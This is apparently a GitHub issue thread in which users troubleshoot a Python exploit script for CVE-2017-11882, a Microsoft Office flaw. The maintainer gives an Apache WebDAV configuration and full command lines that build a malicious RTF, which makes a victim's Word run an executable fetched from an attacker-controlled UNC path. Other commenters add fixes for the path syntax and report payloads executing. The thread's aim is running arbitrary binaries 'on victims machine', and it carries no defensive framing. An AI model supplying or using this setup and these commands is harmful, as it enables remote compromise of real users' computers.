Comments (8)
Seems like that it uses UNC path, according to my understanding that is path to file shared on the network.
Although i am also interested to download file using http.
from cve-2017-11882.
Hi - i can't run thise exploite -
i use thise command
python webdav_exec_CVE-2017-11882.py -u \192.168.1.11\ff\sss.exe -e C:\Windows\system32\calc.exe -o test
and exploite massage
but not work word file
from cve-2017-11882.
Hello!
First of all you will need a properly configured HTTP server with WebDAV support (it's important obviously) in order to execute arbitrary binary on victims machine. It may be a tricky to configure HTTP server properly. I am using apache httpd on Centos 6 machine. Your setup should support anonymous authentication and file locking. So I have something like this in my httpd.conf
Alias /dav "/var/www/dav"
<IfModule dav_lock_module>
DavLockDB "/var/www/dav"
</IfModule>
<Directory "/var/www/dav">
Header set Access-Control-Allow-Origin "*"
Dav On
</Directory>
Something may be missed, because now I cannot remember exactly how I configured it.
After you properly configured HTTP server, make sure that your WebDAV folder is accessible from the outside and executable files can be launched from this location. For example with Win+R
shortcut.
WebDAV uses HTTP as transport and can be accessed with UNC path just like SMB.
That's why you should create sample exploit file with UNC paths:
python webdav_exec_CVE-2017-11882.py -u \\192.168.1.166\dav -e \\192.168.1.166\dav\1.exe -o test.rtf
In fact first UNC path can be just any UNC path which comply with command length limitation.
It is used to trigger start of WebClient service.
If everything is configured right you can launch your binary on a victims machine. Hope that helps.
I will update README.md ASAP and close this issue.
from cve-2017-11882.
can you explain that step by step
i edit the webdav and i can access files from another pc
but with word it's show me this error
https://image.prntscr.com/image/fSzsc4ruSCGFv31qxBInPQ.png
from cve-2017-11882.
According to your screenshot, you missed one leading backslash. This can be caused by your shell environment. Maybe \
is considered as a special symbol by your shell where you execute this script. If you can run your payload with Win+R
box with UNC path \\192.168.1.166\webdav\1.exe
, then you can do this with exploit.
from cve-2017-11882.
I am still confused how it is working.
from cve-2017-11882.
hi guys for any reason the exploits does not works fine, maybe must use this: "//" and not "\" i have been this problem.
As seen when you use kali linux the correct way is this:
python webdav_exec_CVE-2017-11882.py -u //192.168.0.100/temp -e //192.168.0.100/temp/1.exe -o example.rtf
thanks good job!!
from cve-2017-11882.
Hi, so I connected my local PC to my cpanel thru webdisk and after some trials, I was able to get the exploit to work and execute payload on my local PC. But wen I run the same file on another PC which is not connected to my cpanel webdisk, it does not download the payload.
from cve-2017-11882.
Related Issues (5)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from cve-2017-11882.